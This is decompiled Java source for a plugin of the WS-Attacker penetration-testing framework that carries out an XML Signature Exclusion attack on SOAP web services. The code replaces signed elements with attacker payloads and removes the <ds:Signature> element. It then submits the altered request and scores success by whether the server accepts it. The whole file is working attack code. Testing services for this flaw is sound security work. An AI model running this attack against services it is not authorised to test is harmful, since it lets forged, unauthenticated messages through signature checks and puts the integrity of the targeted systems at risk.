/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.signatureWrapping;

import com.eviware.soapui.impl.wsdl.WsdlRequest;
import com.eviware.soapui.impl.wsdl.WsdlSubmit;
import com.eviware.soapui.impl.wsdl.WsdlSubmitContext;
import com.eviware.soapui.impl.wsdl.support.soap.SoapUtils;
import com.eviware.soapui.impl.wsdl.support.soap.SoapVersion;
import com.eviware.soapui.model.ModelItem;
import com.eviware.soapui.model.iface.Request;
import com.eviware.soapui.model.iface.SubmitContext;
import java.util.List;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.xml.xpath.XPathExpressionException;
import org.apache.xmlbeans.XmlException;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.xml.sax.SAXException;
import wsattacker.library.signatureWrapping.option.Payload;
import wsattacker.library.signatureWrapping.util.signature.SignatureRemover;
import wsattacker.library.xmlutilities.dom.DomUtilities;
import wsattacker.main.composition.plugin.AbstractPlugin;
import wsattacker.main.composition.testsuite.RequestResponsePair;
import wsattacker.main.plugin.PluginState;
import wsattacker.plugin.signatureWrapping.SignatureWrapping;
import wsattacker.plugin.signatureWrapping.option.OptionManager;

public class SignatureExclusionAttack
extends AbstractPlugin {
    private static final String NAME = "Signature Exclusion Attack";
    private static final String AUTHOR = "Christian Mainka";
    private static final String VERSION = "1.0 / 2012-11-07";
    private static final String[] CATEGORY = new String[]{"Security", "Signature"};
    private static final String DESCRIPTION = "Attack which removes the XML Signature within a signed message.\n\nBackground\nIn some cases, the signature verification logic only verifiesa signature, if one is present.Otherwise it will just forward the message to the application logic.\n\nThis attack plugin will fail, if no <ds:Signature> element can be found\n\nYou can configure the Payloads/Timestamps etc. in the Signature Wrapping Plugin.\nNote, that it is not necessary to enable the XSW Plugin, it can only be usedfor configuration.";
    private WsdlRequest attackRequest = null;
    private String originalSoapAction = null;

    public void initializePlugin() {
        this.setName(NAME);
        this.setAuthor(AUTHOR);
        this.setVersion(VERSION);
        this.setCategory(CATEGORY);
        this.setDescription(DESCRIPTION);
        this.setState(PluginState.Ready);
    }

    public boolean wasSuccessful() {
        return this.getCurrentPoints() == this.getMaxPoints();
    }

    public void clean() {
        this.removeAttackReqeust();
        this.setCurrentPoints(0);
    }

    public void removeAttackReqeust() {
        if (this.originalSoapAction != null && this.attackRequest != null) {
            this.attackRequest.getOperation().setAction(this.originalSoapAction);
            this.originalSoapAction = null;
        }
        if (this.attackRequest != null) {
            this.attackRequest.getOperation().removeRequest(this.attackRequest);
            this.attackRequest = null;
        }
    }

    protected void attackImplementationHook(RequestResponsePair original) {
        block20: {
            WsdlSubmit submit;
            OptionManager optionManager = OptionManager.getInstance();
            this.attackRequest = original.getWsdlRequest().getOperation().addNewRequest(this.getName() + " ATTACK");
            if (optionManager.getOptionSoapAction().getSelectedIndex() > 0) {
                this.originalSoapAction = this.attackRequest.getOperation().getAction();
                this.attackRequest.getOperation().setAction(optionManager.getOptionSoapAction().getValueAsString());
            }
            Element toClone = optionManager.getSignatureManager().getDocument().getDocumentElement();
            Document attackDocument = DomUtilities.createNewDomFromNode((Node)toClone);
            List payloads = optionManager.getSignatureManager().getPayloads();
            for (Payload payload : payloads) {
                Element payloadElement;
                if (!payload.hasPayload()) continue;
                Element signedElement = DomUtilities.findCorrespondingElement((Document)attackDocument, (Element)payload.getSignedElement());
                try {
                    payloadElement = (Element)attackDocument.importNode(payload.getPayloadElement(), true);
                }
                catch (Exception e) {
                    this.log().warn((Object)("Could not get Payload Element for " + signedElement.getNodeName() + " / Skipping."));
                    continue;
                }
                if (signedElement.getParentNode() == null || payloadElement == null) continue;
                signedElement.getParentNode().replaceChild(payloadElement, signedElement);
            }
            SignatureRemover r = new SignatureRemover(attackDocument);
            String attackDocumentAsString = DomUtilities.domToString((Document)attackDocument);
            this.attackRequest.setRequestContent(attackDocumentAsString);
            this.trace("Attack Request: \n\n" + attackDocumentAsString);
            try {
                submit = this.attackRequest.submit((SubmitContext)new WsdlSubmitContext((ModelItem)this.attackRequest), false);
            }
            catch (Request.SubmitException e) {
                this.log().warn((Object)"Could not submit the request. Trying next one.");
                this.setState(PluginState.Failed);
                return;
            }
            String responseContent = submit.getResponse().getContentAsString();
            if (responseContent == null) {
                this.important("The server's answer was empty. Server misconfiguration?");
                this.setCurrentPoints(10);
            } else {
                try {
                    SoapVersion soapVersion = this.attackRequest.getOperation().getInterface().getSoapVersion();
                    if (SoapUtils.isSoapFault((String)responseContent, (SoapVersion)soapVersion)) {
                        String xpath = soapVersion.equals(SoapVersion.Soap11) ? "/*[local-name()='Envelope'][1]/*[local-name()='Body'][1]/*[local-name()='Fault'][1]/*[local-name()='faultstring'][1]" : "/*[local-name()='Envelope'][1]/*[local-name()='Body'][1]/*[local-name()='Fault'][1]/*[local-name()='Reason'][1]/*[local-name()='Text'][1]";
                        try {
                            Document doc = DomUtilities.stringToDom((String)responseContent);
                            try {
                                List match = DomUtilities.evaluateXPath((Document)doc, (String)xpath);
                                StringBuilder sb = new StringBuilder();
                                for (Element ele : match) {
                                    sb.append(ele.getTextContent()).append(" ");
                                }
                                this.info("Server returned with SOAP Fault: " + sb.toString());
                                this.trace(responseContent);
                                break block20;
                            }
                            catch (XPathExpressionException ex) {
                                this.info("Server returned with SOAP Fault.");
                                this.trace(responseContent);
                            }
                        }
                        catch (SAXException ex) {
                            Logger.getLogger(SignatureWrapping.class.getName()).log(Level.SEVERE, null, ex);
                        }
                        break block20;
                    }
                    if (optionManager.getOptionMustContainString().isOn()) {
                        String searchString = optionManager.getOptionTheContainedString().getValue();
                        int index = responseContent.indexOf(searchString);
                        if (index < 0) {
                            this.setCurrentPoints(50);
                            this.info("The answer does not contain the searchstring:\n" + searchString);
                            this.trace(responseContent);
                        } else {
                            this.setCurrentPoints(100);
                            this.important("The answer contains the searchstring:\n" + searchString);
                            this.trace(responseContent);
                        }
                    } else {
                        this.setCurrentPoints(100);
                        this.important("Server accpeted the Attack message. No SOAP Fault received");
                        this.trace(responseContent);
                    }
                }
                catch (XmlException ex) {
                    this.setCurrentPoints(10);
                    this.info("The answer is not valid XML. Server missconfiguration?");
                    this.trace("Request:\n" + ((WsdlRequest)submit.getRequest()).getRequestContent());
                }
            }
        }
        this.removeAttackReqeust();
    }
}

